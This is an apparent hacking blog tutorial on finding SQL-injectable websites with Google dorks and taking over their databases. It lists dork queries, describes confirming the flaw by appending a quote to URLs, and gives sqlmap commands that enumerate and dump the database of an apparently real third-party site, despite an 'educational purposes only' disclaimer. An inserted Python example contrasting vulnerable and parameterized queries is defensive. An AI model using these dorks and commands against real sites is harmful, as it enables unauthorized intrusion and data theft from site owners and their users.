A WAY TO FIND AND USE SQL INJECTION
In my previous post I wrote about what SQL injection is and its impact on websites. If you're not familiar with it, check that out first: Tutorial: A brief story of SQLi
Before getting down to business I want to say to all of you that this is for educational purposes only. Don't misuse it; it's about knowing, not showing off.
Now, how do you find out which websites are vulnerable? The easiest way is to use a Google dork.
inurl: galary.php id=

Definition of Google dorks: advanced Google searches used to find security loopholes on websites and allow hackers to break into or disrupt the site.
Here are some dorks:
allinurl:*.php?txtCodiInfo=
inurl:read.php?=
inurl:”ViewerFrame?Mode=”
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
Just open Google, type one of those dorks and wait for the results. I'm going to take the first one as an example.
Now go to one of the resulting URLs, add ' at the end of the URL, and press Enter.
If it gives you that type of error back you should feel happy. It means you can now SQLi that site without knowing any further details.
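Why the quote produces an error, and what the fix looks like, as an added example that is not part of the original post. It uses Python's built-in sqlite3 as a stand-in for the site's database; the `gallery` table, its rows and the function names are assumptions made up for illustration.

```python
import sqlite3

def make_db():
    """Constructed sample data: an in-memory stand-in for the site's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE gallery (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO gallery VALUES (?, ?)",
                   [(1, "beach"), (2, "harbour")])
    return db

def page_vulnerable(db, id_param):
    """'Before': the id value from the URL is pasted into the SQL text."""
    sql = "SELECT title FROM gallery WHERE id = " + id_param
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # The stray quote breaks the statement, and echoing the driver
        # error to the visitor is what reveals the flaw.
        return "500 SQL error: %s" % exc
    return "200 " + ", ".join(r[0] for r in rows)

def page_hardened(db, id_param):
    """'After': bind the value as data and keep database errors server-side."""
    try:
        rows = db.execute("SELECT title FROM gallery WHERE id = ?",
                          (id_param,)).fetchall()
    except sqlite3.Error:
        return "500 internal error"  # details belong in the server log only
    if not rows:
        return "404 not found"
    return "200 " + ", ".join(r[0] for r in rows)

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'"):  # a normal id, then the same id with a quote
        print(repr(value), "vulnerable ->", page_vulnerable(db, value))
        print(repr(value), "hardened   ->", page_hardened(db, value))
```

With the bound parameter, the quoted value is compared as plain data, so the page returns an ordinary "not found" instead of a database error.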
Now, how are you going to SQLi that site: manually or using some software? I prefer using software. Using a tool named sqlmap you can SQLi and take over the database of a SQLi-vulnerable website. Here is the link where you can download it: sqlmap download
Some sqlmap terminology:
-u : url
-D : --dbs : Database
-T : --tables : table
-C : --columns : column
Now some screenshots that will help you understand how it's done.
Step 1: python .\sqlmap.py -u vulnerable-url --dbs
There are two databases information_schema and web71-tobago.
Step 2: python .\sqlmap.py -u vulnerable-url -D web71-tobago --columns
Now from the retrieved tables select one and do the rest.
Step 3: python .\sqlmap.py -u vulnerable-url -D web71-tobago -C content --dump
That's great ... well, now you've got what you needed. :)
Thanks for visiting us. :)
#DIVIDED_BY_ZERO#
#UNITED_BY_ONE#
#PEACE#
